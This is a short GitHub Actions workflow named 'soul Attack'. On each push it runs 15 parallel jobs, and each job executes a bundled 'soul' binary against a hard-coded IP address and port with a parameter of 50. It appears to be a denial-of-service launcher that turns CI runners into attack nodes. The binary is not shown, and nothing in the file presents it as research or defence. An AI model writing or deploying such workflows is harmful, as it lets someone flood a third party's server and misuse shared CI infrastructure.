name: soul Attack
on: [push]

jobs:
  soul:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,
            11,12,13,14,15]
    steps:
    - uses: actions/checkout@v3
    - name: Run soul executable
      run: |
        chmod +x soul
        ./soul 91.108.17.23 32002 50
